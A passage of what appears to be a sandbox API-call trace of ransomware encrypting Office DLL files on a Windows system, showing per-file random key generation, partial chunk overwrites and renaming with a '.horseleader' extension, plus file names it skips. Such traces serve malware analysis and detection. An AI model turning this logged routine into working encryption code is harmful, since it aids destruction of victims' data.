(in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0237.864] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0237.864] CloseHandle (hObject=0x158) returned 1 [0237.864] GetProcessHeap () returned 0x780000 [0237.864] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0237.864] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.horseleader") returned 83 [0237.864] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll"), 
lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll.horseleader")) returned 1 [0237.866] GetProcessHeap () returned 0x780000 [0237.866] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0237.866] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3706ca00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd80f11a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3706ca00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0xb5db8, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACEDAO.DLL", cAlternateFileName="")) returned 1 [0237.866] lstrcmpiW (lpString1="ACEDAO.DLL", lpString2="Windows") returned -1 [0237.866] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 70 [0237.866] StrStrIW (lpFirst="ACEDAO.DLL", lpSrch=".horseleader") returned 0x0 [0237.866] lstrcmpW (lpString1="ACEDAO.DLL", lpString2="#Decrypt#.txt") returned 1 [0237.866] lstrcmpW (lpString1="ACEDAO.DLL", lpString2="_uninstalling_.png") returned 1 [0237.866] lstrlenW (lpString=".testttjffg") returned 11 [0237.866] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL", lpSrch=".testttjffg") returned 0x0 [0237.867] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0237.867] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0237.867] CreateFileW (lpFileName="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0237.868] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 70 [0237.868] StrStrW (lpFirst="ACEDAO.DLL", lpSrch=".txt") returned 0x0 [0237.868] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=744888) returned 1 [0237.868] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.868] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.010] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0238.011] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.011] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x586dc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.011] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.148] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0238.149] WriteFile (in: hFile=0x158, 
lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.149] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xb0db8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.149] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.258] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0238.258] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.258] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.259] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0238.259] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0238.259] CloseHandle (hObject=0x158) returned 1 [0238.259] GetProcessHeap () returned 0x780000 [0238.259] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0238.260] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL.horseleader") returned 82 [0238.260] 
MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll.horseleader")) returned 1 [0238.261] GetProcessHeap () returned 0x780000 [0238.261] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0238.261] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81925f00, ftCreationTime.dwHighDateTime=0x1caca23, ftLastAccessTime.dwLowDateTime=0x51128590, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x81925f00, ftLastWriteTime.dwHighDateTime=0x1caca23, nFileSizeHigh=0x0, nFileSizeLow=0xa990, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACEERR.DLL", cAlternateFileName="")) returned 1 [0238.261] lstrcmpiW (lpString1="ACEERR.DLL", lpString2="Windows") returned -1 [0238.261] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 70 [0238.261] StrStrIW (lpFirst="ACEERR.DLL", lpSrch=".horseleader") returned 0x0 [0238.261] lstrcmpW (lpString1="ACEERR.DLL", lpString2="#Decrypt#.txt") returned 1 [0238.261] lstrcmpW (lpString1="ACEERR.DLL", lpString2="_uninstalling_.png") returned 1 [0238.261] lstrlenW (lpString=".testttjffg") returned 11 [0238.261] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL", lpSrch=".testttjffg") returned 0x0 [0238.261] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0238.261] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0238.261] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0238.513] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 70 [0238.513] StrStrW (lpFirst="ACEERR.DLL", lpSrch=".txt") returned 0x0 [0238.513] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=43408) returned 1 [0238.513] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.578] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0238.578] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.579] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.691] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0238.691] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.692] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x990, lpOverlapped=0x0) returned 1 [0238.692] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff670, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0238.692] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x990, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x990, lpOverlapped=0x0) returned 1 [0238.692] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.692] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0238.692] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0238.692] CloseHandle (hObject=0x158) returned 1 [0238.693] GetProcessHeap () returned 0x780000 [0238.693] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0238.693] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL.horseleader") returned 82 [0238.693] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll.horseleader")) returned 1 [0238.694] GetProcessHeap () returned 0x780000 [0238.694] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0238.694] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3706ca00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd8117300, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3706ca00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0xf73a8, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACEES.DLL", cAlternateFileName="")) returned 1 [0238.694] lstrcmpiW (lpString1="ACEES.DLL", lpString2="Windows") returned -1 [0238.694] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 69 [0238.694] StrStrIW (lpFirst="ACEES.DLL", lpSrch=".horseleader") returned 0x0 [0238.694] lstrcmpW (lpString1="ACEES.DLL", lpString2="#Decrypt#.txt") returned 1 [0238.694] lstrcmpW (lpString1="ACEES.DLL", lpString2="_uninstalling_.png") returned 1 [0238.694] lstrlenW (lpString=".testttjffg") returned 11 [0238.694] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL", lpSrch=".testttjffg") returned 0x0 [0238.694] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0238.694] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0238.694] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL" 
(normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0238.699] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 69 [0238.699] StrStrW (lpFirst="ACEES.DLL", lpSrch=".txt") returned 0x0 [0238.699] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1012648) returned 1 [0238.699] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.699] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.702] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0238.702] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.702] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x791d4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.702] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.765] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0238.765] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, 
lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.765] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xf23a8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.765] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.839] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0238.839] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0238.839] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.840] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0238.840] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0238.840] CloseHandle (hObject=0x158) returned 1 [0238.840] GetProcessHeap () returned 0x780000 [0238.841] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0238.841] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL.horseleader") returned 81 [0238.841] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acees.dll.horseleader")) returned 1 [0238.842] GetProcessHeap () returned 0x780000 [0238.842] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0238.842] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3706ca00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd8117300, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3706ca00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0x6bfa0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACEEXCH.DLL", cAlternateFileName="")) returned 1 [0238.842] lstrcmpiW (lpString1="ACEEXCH.DLL", lpString2="Windows") returned -1 [0238.842] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 71 [0238.842] StrStrIW (lpFirst="ACEEXCH.DLL", lpSrch=".horseleader") returned 0x0 [0238.842] lstrcmpW (lpString1="ACEEXCH.DLL", lpString2="#Decrypt#.txt") returned 1 [0238.842] lstrcmpW (lpString1="ACEEXCH.DLL", lpString2="_uninstalling_.png") returned 1 [0238.843] lstrlenW (lpString=".testttjffg") returned 11 [0238.843] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL", lpSrch=".testttjffg") returned 0x0 [0238.843] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0238.843] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, 
pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0238.843] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0238.844] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 71 [0238.844] StrStrW (lpFirst="ACEEXCH.DLL", lpSrch=".txt") returned 0x0 [0238.844] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=442272) returned 1 [0238.844] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.844] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0239.368] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0239.368] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0239.368] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x337d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.368] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0239.446] SetFilePointerEx (in: hFile=0x158, 
liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0239.446] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0239.446] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x66fa0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.446] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0239.481] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0239.481] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0239.481] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.481] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0239.481] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, 